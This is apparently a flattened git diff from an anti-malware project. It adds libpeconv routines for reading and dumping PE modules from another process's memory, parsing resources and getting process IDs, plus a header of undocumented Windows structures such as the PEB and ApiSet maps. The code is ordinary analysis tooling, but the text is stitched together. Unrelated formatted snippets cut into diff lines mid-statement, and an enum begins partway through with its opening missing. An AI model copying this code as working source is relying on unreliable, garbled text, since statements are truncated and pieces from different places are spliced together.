BYTE* buffer, const size_t buffer_size) +{ + if (buffer == nullptr) { + return false; + } + SIZE_T read_size = read_remote_memory(processHandle, start_addr, buffer, buffer_size); + if (read_size == 0) { + return false; + } + BYTE *nt_ptr = get_nt_hdrs(buffer); + if (nt_ptr == nullptr) { + return false; + } + const size_t nt_offset = nt_ptr - buffer; + const size_t nt_size = 
namespace peconv {
    /// Rounds `size` up to the nearest multiple of `unit`.
    /// A zero `unit` leaves `size` unchanged.
    inline size_t roundup_to_unit(size_t size, size_t unit)
    {
        if (unit == 0) {
            return size;
        }
        const size_t remainder = size % unit;
        return (remainder == 0) ? size : (size - remainder + unit);
    }
};
nullptr) { + std::cerr << "[-] Invalid output buffer: NULL pointer" << std::endl; + return 0; + } + if (bufferSize < mod_size || bufferSize < MAX_HEADER_SIZE ) { + std::cerr << "[-] Invalid output buffer: too small size!" << std::endl; + return 0; + } + // read PE section by section + PBYTE hdr_buffer = buffer; + //try to read headers: + if (!read_remote_pe_header(processHandle, start_addr, hdr_buffer, MAX_HEADER_SIZE)) { + std::cerr << "[-] Failed to read the module header" << std::endl; + return 0; + } + if (!is_valid_sections_hdr_offset(hdr_buffer, MAX_HEADER_SIZE)) { + std::cerr << "[-] Sections headers are invalid or atypically aligned" << std::endl; + return 0; + } + size_t sections_count = get_sections_count(hdr_buffer, MAX_HEADER_SIZE); +#ifdef _DEBUG + std::cout << "Sections: " << sections_count << std::endl; +#endif + size_t read_size = MAX_HEADER_SIZE; + + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER hdr = get_section_hdr(hdr_buffer, MAX_HEADER_SIZE, i); + if (!hdr) { + std::cerr << "[-] Failed to read the header of section: " << i << std::endl; + break; + } + const DWORD sec_va = hdr->VirtualAddress; + const DWORD sec_vsize = get_virtual_sec_size(hdr_buffer, hdr, true); + if (sec_va + sec_vsize > bufferSize) { + std::cerr << "[-] No more space in the buffer!" 
<< std::endl; + break; + } + if (sec_vsize > 0 && !read_remote_memory(processHandle, start_addr + sec_va, buffer + sec_va, sec_vsize)) { + std::cerr << "[-] Failed to read the module section " << i <<" : at: " << std::hex << ULONG_PTR(start_addr + sec_va) << std::endl; + } + // update the end of the read area: + size_t new_end = sec_va + sec_vsize; + if (new_end > read_size) read_size = new_end; + } +#ifdef _DEBUG + std::cout << "Total read size: " << read_size << std::endl; +#endif + return read_size; +} + +DWORD peconv::get_remote_image_size(IN const HANDLE processHandle, IN BYTE *start_addr) +{ + BYTE hdr_buffer[MAX_HEADER_SIZE] = { 0 }; + if (!read_remote_pe_header(processHandle, start_addr, hdr_buffer, MAX_HEADER_SIZE)) { + return 0; + } + return peconv::get_image_size(hdr_buffer); +} + +bool peconv::dump_remote_pe(IN const char *out_path, + IN const HANDLE processHandle, + IN BYTE* start_addr, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL peconv::ExportsMapper* exportsMap) +{ + DWORD mod_size = get_remote_image_size(processHandle, start_addr); +#ifdef _DEBUG + std::cout << "Module Size: " << mod_size << std::endl; +#endif + if (mod_size == 0) { + return false; + } + + BYTE* buffer = peconv::alloc_pe_buffer(mod_size, PAGE_READWRITE); + if (buffer == nullptr) { + std::cerr << "[-] Failed allocating buffer. Error: " << GetLastError() << std::endl; + return false; + } + //read the module that it mapped in the remote process: + const size_t read_size = read_remote_pe(processHandle, start_addr, mod_size, buffer, mod_size); + if (read_size == 0) { + std::cerr << "[-] Failed reading module. 
Error: " << GetLastError() << std::endl; + peconv::free_pe_buffer(buffer, mod_size); + buffer = nullptr; + return false; + } + + const bool is_dumped = peconv::dump_pe(out_path, + buffer, mod_size, + reinterpret_cast(start_addr), + dump_mode, exportsMap); + + peconv::free_pe_buffer(buffer, mod_size); + buffer = nullptr; + return is_dumped; +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp b/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp new file mode 100644 index 0000000..4d22469 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp @@ -0,0 +1,90 @@ +#include "peconv/resource_parser.h" +#include "peconv/pe_hdrs_helper.h" + +#ifdef _DEBUG +#include +#endif + +bool parse_resource_dir(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + IMAGE_RESOURCE_DIRECTORY* curr_dir, + peconv::t_on_res_entry_found on_entry); + +bool parse_resource_entry(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + IMAGE_RESOURCE_DIRECTORY_ENTRY* entry, + peconv::t_on_res_entry_found on_entry) +{ + if (!entry->DataIsDirectory) { +#ifdef _DEBUG + std::cout << "Entry is NOT a directory\n"; +#endif + DWORD offset = entry->OffsetToData; +#ifdef _DEBUG + std::cout << "Offset: " << offset << std::endl; +#endif + IMAGE_RESOURCE_DATA_ENTRY *data_entry = (IMAGE_RESOURCE_DATA_ENTRY*)(offset + (ULONGLONG)upper_dir); + if (!peconv::validate_ptr(modulePtr, moduleSize, data_entry, sizeof(IMAGE_RESOURCE_DATA_ENTRY))) { + return false; + } +#ifdef _DEBUG + std::cout << "Data Offset: " << data_entry->OffsetToData << " : " << data_entry->Size << std::endl; +#endif + BYTE* data_ptr = (BYTE*)((ULONGLONG)modulePtr + data_entry->OffsetToData); + if (!peconv::validate_ptr(modulePtr, moduleSize, data_ptr, data_entry->Size)) { + return false; + } + on_entry(modulePtr, root_dir, data_entry); 
+ return true; + } +#ifdef _DEBUG + std::cout << "Entry is a directory\n"; +#endif + //else: it is a next level directory + DWORD offset = entry->OffsetToDirectory; +#ifdef _DEBUG + std::cout << "Offset: " << offset << std::endl; +#endif + IMAGE_RESOURCE_DIRECTORY *next_dir = (IMAGE_RESOURCE_DIRECTORY*)(offset + (ULONGLONG)upper_dir); + if (!peconv::validate_ptr(modulePtr, moduleSize, next_dir, sizeof(IMAGE_RESOURCE_DIRECTORY))) { + return false; + } + return parse_resource_dir(modulePtr, moduleSize, root_dir, upper_dir, next_dir, on_entry); +} + +bool parse_resource_dir(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + IMAGE_RESOURCE_DIRECTORY* curr_dir, + peconv::t_on_res_entry_found on_entry) +{ + size_t total_entries = curr_dir->NumberOfIdEntries + curr_dir->NumberOfNamedEntries; + IMAGE_RESOURCE_DIRECTORY_ENTRY* first_entry = (IMAGE_RESOURCE_DIRECTORY_ENTRY*)((ULONGLONG)&curr_dir->NumberOfIdEntries + sizeof(WORD)); + for (size_t i = 0; i < total_entries; i++) { + IMAGE_RESOURCE_DIRECTORY_ENTRY* entry = &first_entry[i]; +#ifdef _DEBUG + std::cout << "Entry:" << std::hex << i << " ; " << "Id: " << entry->Id << " ; dataOffset:" << entry->OffsetToData << "\n"; +#endif + if (root_dir == nullptr) { + root_dir = entry; + } + parse_resource_entry(modulePtr, moduleSize, root_dir, upper_dir, entry, on_entry); + } + return true; +} + +bool peconv::parse_resources(BYTE* modulePtr, t_on_res_entry_found on_entry) +{ + const size_t module_size = peconv::get_image_size(modulePtr); + IMAGE_DATA_DIRECTORY *dir = peconv::get_directory_entry(modulePtr, IMAGE_DIRECTORY_ENTRY_RESOURCE); + if (!dir || dir->VirtualAddress == 0 || dir->Size == 0) { + return false; + } + IMAGE_RESOURCE_DIRECTORY *res_dir = (IMAGE_RESOURCE_DIRECTORY*)(dir->VirtualAddress + (ULONGLONG)modulePtr); + if (!peconv::validate_ptr(modulePtr, module_size, res_dir, sizeof(IMAGE_DEBUG_DIRECTORY))) { + return false; + } + return 
parse_resource_dir(modulePtr, module_size, nullptr, res_dir, res_dir, on_entry); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp new file mode 100644 index 0000000..6a7e8f5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp @@ -0,0 +1,56 @@ +#include "peconv/resource_util.h" + +#ifdef _DEBUG +#include +#endif + +HMODULE peconv::get_current_module_handle() +{ + HMODULE hMod = NULL; + GetModuleHandleExW( + GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, + reinterpret_cast(&peconv::get_current_module_handle), + &hMod); + return hMod; +} + +peconv::ALIGNED_BUF peconv::load_resource_data(OUT size_t &out_size, int res_id, const LPSTR res_type, HMODULE hInstance) +{ + if (hInstance == nullptr) { + hInstance = GetModuleHandleA(NULL); + } + HRSRC res = FindResourceA(hInstance, MAKEINTRESOURCEA(res_id), res_type); + if (!res) { +#ifdef _DEBUG + std::cerr << "Cannot find resource" << std::endl; +#endif + return nullptr; + } + HGLOBAL res_handle = LoadResource(hInstance, res); + if (res_handle == nullptr) { +#ifdef _DEBUG + std::cerr << "Cannot get resource handle" << std::endl; +#endif + return nullptr; + } + BYTE* res_data = (BYTE*) LockResource(res_handle); + size_t r_size = static_cast(SizeofResource(hInstance, res)); + if (out_size != 0 && out_size <= r_size) { + r_size = out_size; + } + + peconv::ALIGNED_BUF out_buf = peconv::alloc_aligned(r_size, PAGE_READWRITE); + if (out_buf != nullptr) { + memcpy(out_buf, res_data, r_size); + out_size = r_size; + } else { + out_size = 0; + } + FreeResource(res_handle); + return out_buf; +} + +void peconv::free_resource_data(peconv::ALIGNED_BUF buffer) +{ + peconv::free_aligned(buffer); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/util.cpp new file mode 100644 index 0000000..167e8b4 --- /dev/null +++ 
b/ai_anti_malware/libpeconv/libpeconv/src/util.cpp @@ -0,0 +1,100 @@ +#include "peconv/util.h" + +namespace peconv { + DWORD(WINAPI *g_GetProcessId)(IN HANDLE Process) = nullptr; + + HMODULE g_kernel32Hndl = nullptr; + HMODULE g_ntdllHndl = nullptr; + + HMODULE get_kernel32_hndl() + { + if (g_kernel32Hndl == nullptr) { + g_kernel32Hndl = LoadLibraryA("kernel32.dll"); + } + return g_kernel32Hndl; + } + + HMODULE get_ntdll_hndl() + { + if (g_ntdllHndl == nullptr) { + g_ntdllHndl = LoadLibraryA("ntdll.dll"); + } + return g_ntdllHndl; + } +}; + +DWORD ntdll_get_process_id(HANDLE hProcess) +{ +#if !defined PROCESSINFOCLASS + typedef LONG PROCESSINFOCLASS; +#endif + + NTSTATUS(WINAPI *_ZwQueryInformationProcess)( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT PULONG ReturnLength + ) = NULL; + + HINSTANCE hNtDll = peconv::get_ntdll_hndl(); + if (!hNtDll) { + return 0; + } + + FARPROC procPtr = GetProcAddress(hNtDll, "ZwQueryInformationProcess"); + if (!procPtr) { + return 0; + } + + _ZwQueryInformationProcess = (NTSTATUS(WINAPI *)( + HANDLE, + PROCESSINFOCLASS, + PVOID, + ULONG, + PULONG) + ) procPtr; + + typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PVOID PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; + } PROCESS_BASIC_INFORMATION; + + PROCESS_BASIC_INFORMATION pbi = { 0 }; + if (_ZwQueryInformationProcess(hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) == S_OK) { + const DWORD pid = static_cast(pbi.UniqueProcessId); + return pid; + } + return 0; +} + +DWORD peconv::get_process_id(HANDLE hProcess) +{ + if (!peconv::g_GetProcessId) { + HMODULE kernelLib = peconv::get_kernel32_hndl(); + if (!kernelLib) return FALSE; + + FARPROC procPtr = GetProcAddress(kernelLib, "GetProcessId"); + if (!procPtr) return FALSE; + + peconv::g_GetProcessId = (DWORD(WINAPI *) (IN HANDLE))procPtr; + } + if 
(peconv::g_GetProcessId) { + return peconv::g_GetProcessId(hProcess); + } + //could not retrieve Pid using GetProcessId, try using NTDLL: + return ntdll_get_process_id(hProcess); +} + +bool peconv::is_padding(const BYTE *cave_ptr, size_t cave_size, const BYTE padding) +{ + for (size_t i = 0; i < cave_size; i++) { + if (cave_ptr[i] != padding) { + return false; + } + } + return true; +} diff --git a/ai_anti_malware/native_struct.h b/ai_anti_malware/native_struct.h new file mode 100644 index 0000000..7d6bfcd --- /dev/null +++ b/ai_anti_malware/native_struct.h @@ -0,0 +1,1028 @@ +#pragma once +#include "head.h" +enum params_type { + PARAMS_INT, + PARAMS_CHAR, + PARAMS_WCHAR, + PARAMS_UINT, +}; + +// ApiSetschema v1 structs +// --------------------------------------------------------------------------------------------- + +// Windows 6.x redirection descriptor, describes forward and backward +// redirections. +typedef struct _REDIRECTION { + DWORD OffsetRedirection1; + USHORT RedirectionLength1; + USHORT _padding1; + DWORD OffsetRedirection2; + USHORT RedirectionLength2; + USHORT _padding2; +} REDIRECTION, *PREDIRECTION; + +// Windows 6.x library director structure, describes redirections. +typedef struct _DLLREDIRECTOR { + DWORD NumberOfRedirections; // Number of REDIRECTION structs. + REDIRECTION Redirection[1]; // array of REDIRECTION structures +} DLLREDIRECTOR, *PDLLREDIRECTOR; + +// Windows 6.x library descriptor structure. These are located as a contiguously +// allocated array from the start of the first structure. +typedef struct _DLLHOSTDESCRIPTOR { + DWORD OffsetDllString; + DWORD StringLength; + DWORD OffsetDllRedirector; // offset to DLLREDIRECTOR +} DLLHOSTDESCRIPTOR, *PDLLHOSTDESCRIPTOR; + +// Windows 6.x ApiSetSchema base structure. +typedef struct _APISETMAP { + DWORD Version; // dummy name (this field is never used) + DWORD NumberOfHosts; // number of DLLHOSTDESCRIPTOR structures following. 
+ DLLHOSTDESCRIPTOR descriptors[1]; // array of DLLHOSTDESCRIPTOR structures. +} APISETMAP, *PAPISETMAP; + +// ApiSetschema v2 structs for Windows 8.1. +// --------------------------------------------------------------------------------------------- + +typedef struct _API_SET_VALUE_ENTRY_V2 { + ULONG Flags; + ULONG NameOffset; + ULONG NameLength; + ULONG ValueOffset; + ULONG ValueLength; +} API_SET_VALUE_ENTRY_V2, *PAPI_SET_VALUE_ENTRY_V2; + +typedef struct _API_SET_VALUE_ARRAY_V2 { + ULONG Flags; + ULONG Count; + _API_SET_VALUE_ENTRY_V2 Array[ANYSIZE_ARRAY]; +} API_SET_VALUE_ARRAY_V2, *PAPI_SET_VALUE_ARRAY_V2; + +typedef struct _API_SET_NAMESPACE_ENTRY_V2 { + ULONG Flags; + ULONG NameOffset; + ULONG NameLength; + ULONG AliasOffset; + ULONG AliasLength; + ULONG DataOffset; // API_SET_VALUE_ARRAY +} API_SET_NAMESPACE_ENTRY_V2, *PAPI_SET_NAMESPACE_ENTRY_V2; + +typedef struct _API_SET_NAMESPACE_ARRAY_V2 { + ULONG Version; + ULONG Size; + ULONG Flags; + ULONG Count; + _API_SET_NAMESPACE_ENTRY_V2 Array[ANYSIZE_ARRAY]; +} API_SET_NAMESPACE_ARRAY_V2, *PAPI_SET_NAMESPACE_ARRAY_V2; + +// ApiSetschema structs for Windows 10. 
// Windows 10 ApiSet namespace entry. NOTE(review): this layout is undocumented
// (reverse-engineered apisetschema v6); field meanings below are presumed -
// verify against the target Windows build before relying on them.
typedef struct _API_SET_NAMESPACE_ENTRY_10 {
    uint32_t Flags;        // entry flags (presumed: sealed/extension bits)
    uint32_t NameOffset;   // presumed offset (from map base) of the UTF-16 api set name
    uint32_t NameLength;   // presumed name length in bytes
    uint32_t HashedLength; // presumed number of name bytes covered by the name hash
    uint32_t ValueOffset;  // presumed offset of the value-entry array
    uint32_t ValueCount;   // presumed number of value entries
} API_SET_NAMESPACE_ENTRY_10, *PAPI_SET_NAMESPACE_ENTRY_10;
kIa32VmxProcBasedCtls = 0x482, + kIa32VmxExitCtls = 0x483, + kIa32VmxEntryCtls = 0x484, + kIa32VmxMisc = 0x485, + kIa32VmxCr0Fixed0 = 0x486, + kIa32VmxCr0Fixed1 = 0x487, + kIa32VmxCr4Fixed0 = 0x488, + kIa32VmxCr4Fixed1 = 0x489, + kIa32VmxVmcsEnum = 0x48A, + kIa32VmxProcBasedCtls2 = 0x48B, + kIa32VmxEptVpidCap = 0x48C, + kIa32VmxTruePinbasedCtls = 0x48D, + kIa32VmxTrueProcBasedCtls = 0x48E, + kIa32VmxTrueExitCtls = 0x48F, + kIa32VmxTrueEntryCtls = 0x490, + kIa32VmxVmfunc = 0x491, + + kIa32Efer = 0xC0000080, + kIa32Star = 0xC0000081, + kIa32Lstar = 0xC0000082, + + kIa32Fmask = 0xC0000084, + + kIa32FsBase = 0xC0000100, + kIa32GsBase = 0xC0000101, + kIa32KernelGsBase = 0xC0000102, + kIa32TscAux = 0xC0000103, +}; +typedef struct _PEB_LDR_DATA { + BYTE Reserved1[8]; + PVOID Reserved2[3]; + LIST_ENTRY InMemoryOrderModuleList; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _LDR_DATA_TABLE_ENTRY { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImages; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + union { + LIST_ENTRY HashLinks; + struct { + PVOID SectionPointer; + ULONG CheckSum; + }; + }; + union { + struct { + ULONG TimeDateStamp; + }; + struct { + PVOID LoadedImports; + }; + }; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +typedef struct _BASE_RELOCATION_ENTRY { + WORD Offset : 12; + WORD Type : 4; +} BASE_RELOCATION_ENTRY; +typedef VOID(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE)(VOID); +// 0x10 bytes (sizeof) +struct _STRING64 { + USHORT Length; // 0x0 + USHORT MaximumLength; // 0x2 + ULONGLONG Buffer; // 0x8 +}; + +// 0x58 bytes (sizeof) +struct X64_PEB_LDR_DATA { + ULONG 
Length; // 0x0 + UCHAR Initialized; // 0x4 + VOID* SsHandle; // 0x8 + struct _LIST_ENTRY InLoadOrderModuleList; // 0x10 + struct _LIST_ENTRY InMemoryOrderModuleList; // 0x20 + struct _LIST_ENTRY InInitializationOrderModuleList; // 0x30 + VOID* EntryInProgress; // 0x40 + UCHAR ShutdownInProgress; // 0x48 + VOID* ShutdownThreadId; // 0x50 +}; +static_assert(sizeof(X64_PEB_LDR_DATA) == 0x58, "X64_PEB_LDR_DATA Size check"); + +typedef struct X64PEB { + UCHAR InheritedAddressSpace; // 0x0 + UCHAR ReadImageFileExecOptions; // 0x1 + UCHAR BeingDebugged; // 0x2 + union { + UCHAR BitField; // 0x3 + struct { + UCHAR ImageUsesLargePages : 1; // 0x3 + UCHAR IsProtectedProcess : 1; // 0x3 + UCHAR IsImageDynamicallyRelocated : 1; // 0x3 + UCHAR SkipPatchingUser32Forwarders : 1; // 0x3 + UCHAR IsPackagedProcess : 1; // 0x3 + UCHAR IsAppContainer : 1; // 0x3 + UCHAR IsProtectedProcessLight : 1; // 0x3 + UCHAR IsLongPathAwareProcess : 1; // 0x3 + }; + }; + UCHAR Padding0[4]; // 0x4 + ULONGLONG Mutant; // 0x8 + ULONGLONG ImageBaseAddress; // 0x10 + ULONGLONG Ldr; // 0x18 + ULONGLONG ProcessParameters; // 0x20 + ULONGLONG SubSystemData; // 0x28 + ULONGLONG ProcessHeap; // 0x30 + ULONGLONG FastPebLock; // 0x38 + ULONGLONG AtlThunkSListPtr; // 0x40 + ULONGLONG IFEOKey; // 0x48 + union { + ULONG CrossProcessFlags; // 0x50 + struct { + ULONG ProcessInJob : 1; // 0x50 + ULONG ProcessInitializing : 1; // 0x50 + ULONG ProcessUsingVEH : 1; // 0x50 + ULONG ProcessUsingVCH : 1; // 0x50 + ULONG ProcessUsingFTH : 1; // 0x50 + ULONG ProcessPreviouslyThrottled : 1; // 0x50 + ULONG ProcessCurrentlyThrottled : 1; // 0x50 + ULONG ProcessImagesHotPatched : 1; // 0x50 + ULONG ReservedBits0 : 24; // 0x50 + }; + }; + UCHAR Padding1[4]; // 0x54 + union { + ULONGLONG KernelCallbackTable; // 0x58 + ULONGLONG UserSharedInfoPtr; // 0x58 + }; + ULONG SystemReserved; // 0x60 + ULONG AtlThunkSListPtr32; // 0x64 + ULONGLONG ApiSetMap; // 0x68 + ULONG TlsExpansionCounter; // 0x70 + UCHAR Padding2[4]; // 0x74 + 
ULONGLONG TlsBitmap; // 0x78 + ULONG TlsBitmapBits[2]; // 0x80 + ULONGLONG ReadOnlySharedMemoryBase; // 0x88 + ULONGLONG SharedData; // 0x90 + ULONGLONG ReadOnlyStaticServerData; // 0x98 + ULONGLONG AnsiCodePageData; // 0xa0 + ULONGLONG OemCodePageData; // 0xa8 + ULONGLONG UnicodeCaseTableData; // 0xb0 + ULONG NumberOfProcessors; // 0xb8 + ULONG NtGlobalFlag; // 0xbc + union _LARGE_INTEGER CriticalSectionTimeout; // 0xc0 + ULONGLONG HeapSegmentReserve; // 0xc8 + ULONGLONG HeapSegmentCommit; // 0xd0 + ULONGLONG HeapDeCommitTotalFreeThreshold; // 0xd8 + ULONGLONG HeapDeCommitFreeBlockThreshold; // 0xe0 + ULONG NumberOfHeaps; // 0xe8 + ULONG MaximumNumberOfHeaps; // 0xec + ULONGLONG ProcessHeaps; // 0xf0 + ULONGLONG GdiSharedHandleTable; // 0xf8 + ULONGLONG ProcessStarterHelper; // 0x100 + ULONG GdiDCAttributeList; // 0x108 + UCHAR Padding3[4]; // 0x10c + ULONGLONG LoaderLock; // 0x110 + ULONG OSMajorVersion; // 0x118 + ULONG OSMinorVersion; // 0x11c + USHORT OSBuildNumber; // 0x120 + USHORT OSCSDVersion; // 0x122 + ULONG OSPlatformId; // 0x124 + ULONG ImageSubsystem; // 0x128 + ULONG ImageSubsystemMajorVersion; // 0x12c + ULONG ImageSubsystemMinorVersion; // 0x130 + UCHAR Padding4[4]; // 0x134 + ULONGLONG ActiveProcessAffinityMask; // 0x138 + ULONG GdiHandleBuffer[60]; // 0x140 + ULONGLONG PostProcessInitRoutine; // 0x230 + ULONGLONG TlsExpansionBitmap; // 0x238 + ULONG TlsExpansionBitmapBits[32]; // 0x240 + ULONG SessionId; // 0x2c0 + UCHAR Padding5[4]; // 0x2c4 + union _ULARGE_INTEGER AppCompatFlags; // 0x2c8 + union _ULARGE_INTEGER AppCompatFlagsUser; // 0x2d0 + ULONGLONG pShimData; // 0x2d8 + ULONGLONG AppCompatInfo; // 0x2e0 + struct _STRING64 CSDVersion; // 0x2e8 + ULONGLONG ActivationContextData; // 0x2f8 + ULONGLONG ProcessAssemblyStorageMap; // 0x300 + ULONGLONG SystemDefaultActivationContextData; // 0x308 + ULONGLONG SystemAssemblyStorageMap; // 0x310 + ULONGLONG MinimumStackCommit; // 0x318 + ULONGLONG FlsCallback; // 0x320 + struct LIST_ENTRY64 
FlsListHead; // 0x328 + ULONGLONG FlsBitmap; // 0x338 + ULONG FlsBitmapBits[4]; // 0x340 + ULONG FlsHighIndex; // 0x350 + ULONGLONG WerRegistrationData; // 0x358 + ULONGLONG WerShipAssertPtr; // 0x360 + ULONGLONG pUnused; // 0x368 + ULONGLONG pImageHeaderHash; // 0x370 + union { + ULONG TracingFlags; // 0x378 + struct { + ULONG HeapTracingEnabled : 1; // 0x378 + ULONG CritSecTracingEnabled : 1; // 0x378 + ULONG LibLoaderTracingEnabled : 1; // 0x378 + ULONG SpareTracingBits : 29; // 0x378 + }; + }; + UCHAR Padding6[4]; // 0x37c + ULONGLONG CsrServerReadOnlySharedMemoryBase; // 0x380 + ULONGLONG TppWorkerpListLock; // 0x388 + struct LIST_ENTRY64 TppWorkerpList; // 0x390 + ULONGLONG WaitOnAddressHashTable[128]; // 0x3a0 + ULONGLONG TelemetryCoverageHeader; // 0x7a0 + ULONG CloudFileFlags; // 0x7a8 + ULONG CloudFileDiagFlags; // 0x7ac + CHAR PlaceholderCompatibilityMode; // 0x7b0 + CHAR PlaceholderCompatibilityModeReserved[7]; // 0x7b1 + ULONGLONG LeapSecondData; // 0x7b8 + union { + ULONG LeapSecondFlags; // 0x7c0 + struct { + ULONG SixtySecondEnabled : 1; // 0x7c0 + ULONG Reserved : 31; // 0x7c0 + }; + }; + ULONG NtGlobalFlag2; // 0x7c4 +}; +static_assert(sizeof(X64PEB) == 0x7c8, "X64PEB Size check"); +//0x8 bytes (sizeof) +struct _STRING32 +{ + USHORT Length; //0x0 + USHORT MaximumLength; //0x2 + ULONG Buffer; //0x4 +}; +//0x480 bytes (sizeof) +struct X32PEB +{ + UCHAR InheritedAddressSpace; //0x0 + UCHAR ReadImageFileExecOptions; //0x1 + UCHAR BeingDebugged; //0x2 + union + { + UCHAR BitField; //0x3 + struct + { + UCHAR ImageUsesLargePages : 1; //0x3 + UCHAR IsProtectedProcess : 1; //0x3 + UCHAR IsImageDynamicallyRelocated : 1; //0x3 + UCHAR SkipPatchingUser32Forwarders : 1; //0x3 + UCHAR IsPackagedProcess : 1; //0x3 + UCHAR IsAppContainer : 1; //0x3 + UCHAR IsProtectedProcessLight : 1; //0x3 + UCHAR IsLongPathAwareProcess : 1; //0x3 + }; + }; + ULONG Mutant; //0x4 + ULONG ImageBaseAddress; //0x8 + ULONG Ldr; //0xc + ULONG ProcessParameters; //0x10 + ULONG 
SubSystemData; //0x14 + ULONG ProcessHeap; //0x18 + ULONG FastPebLock; //0x1c + ULONG AtlThunkSListPtr; //0x20 + ULONG IFEOKey; //0x24 + union + { + ULONG CrossProcessFlags; //0x28 + struct + { + ULONG ProcessInJob : 1; //0x28 + ULONG ProcessInitializing : 1; //0x28 + ULONG ProcessUsingVEH : 1; //0x28 + ULONG ProcessUsingVCH : 1; //0x28 + ULONG ProcessUsingFTH : 1; //0x28 + ULONG ProcessPreviouslyThrottled : 1; //0x28 + ULONG ProcessCurrentlyThrottled : 1; //0x28 + ULONG ProcessImagesHotPatched : 1; //0x28 + ULONG ReservedBits0 : 24; //0x28 + }; + }; + union + { + ULONG KernelCallbackTable; //0x2c + ULONG UserSharedInfoPtr; //0x2c + }; + ULONG SystemReserved; //0x30 + ULONG AtlThunkSListPtr32; //0x34 + ULONG ApiSetMap; //0x38 + ULONG TlsExpansionCounter; //0x3c + ULONG TlsBitmap; //0x40 + ULONG TlsBitmapBits[2]; //0x44 + ULONG ReadOnlySharedMemoryBase; //0x4c + ULONG SharedData; //0x50 + ULONG ReadOnlyStaticServerData; //0x54 + ULONG AnsiCodePageData; //0x58 + ULONG OemCodePageData; //0x5c + ULONG UnicodeCaseTableData; //0x60 + ULONG NumberOfProcessors; //0x64 + ULONG NtGlobalFlag; //0x68 + union _LARGE_INTEGER CriticalSectionTimeout; //0x70 + ULONG HeapSegmentReserve; //0x78 + ULONG HeapSegmentCommit; //0x7c + ULONG HeapDeCommitTotalFreeThreshold; //0x80 + ULONG HeapDeCommitFreeBlockThreshold; //0x84 + ULONG NumberOfHeaps; //0x88 + ULONG MaximumNumberOfHeaps; //0x8c + ULONG ProcessHeaps; //0x90 + ULONG GdiSharedHandleTable; //0x94 + ULONG ProcessStarterHelper; //0x98 + ULONG GdiDCAttributeList; //0x9c + ULONG LoaderLock; //0xa0 + ULONG OSMajorVersion; //0xa4 + ULONG OSMinorVersion; //0xa8 + USHORT OSBuildNumber; //0xac + USHORT OSCSDVersion; //0xae + ULONG OSPlatformId; //0xb0 + ULONG ImageSubsystem; //0xb4 + ULONG ImageSubsystemMajorVersion; //0xb8 + ULONG ImageSubsystemMinorVersion; //0xbc + ULONG ActiveProcessAffinityMask; //0xc0 + ULONG GdiHandleBuffer[34]; //0xc4 + ULONG PostProcessInitRoutine; //0x14c + ULONG TlsExpansionBitmap; //0x150 + ULONG 
TlsExpansionBitmapBits[32]; //0x154 + ULONG SessionId; //0x1d4 + union _ULARGE_INTEGER AppCompatFlags; //0x1d8 + union _ULARGE_INTEGER AppCompatFlagsUser; //0x1e0 + ULONG pShimData; //0x1e8 + ULONG AppCompatInfo; //0x1ec + struct _STRING32 CSDVersion; //0x1f0 + ULONG ActivationContextData; //0x1f8 + ULONG ProcessAssemblyStorageMap; //0x1fc + ULONG SystemDefaultActivationContextData; //0x200 + ULONG SystemAssemblyStorageMap; //0x204 + ULONG MinimumStackCommit; //0x208 + ULONG SparePointers[4]; //0x20c + ULONG SpareUlongs[5]; //0x21c + ULONG WerRegistrationData; //0x230 + ULONG WerShipAssertPtr; //0x234 + ULONG pUnused; //0x238 + ULONG pImageHeaderHash; //0x23c + union + { + ULONG TracingFlags; //0x240 + struct + { + ULONG HeapTracingEnabled : 1; //0x240 + ULONG CritSecTracingEnabled : 1; //0x240 + ULONG LibLoaderTracingEnabled : 1; //0x240 + ULONG SpareTracingBits : 29; //0x240 + }; + }; + ULONGLONG CsrServerReadOnlySharedMemoryBase; //0x248 + ULONG TppWorkerpListLock; //0x250 + struct LIST_ENTRY32 TppWorkerpList; //0x254 + ULONG WaitOnAddressHashTable[128]; //0x25c + ULONG TelemetryCoverageHeader; //0x45c + ULONG CloudFileFlags; //0x460 + ULONG CloudFileDiagFlags; //0x464 + CHAR 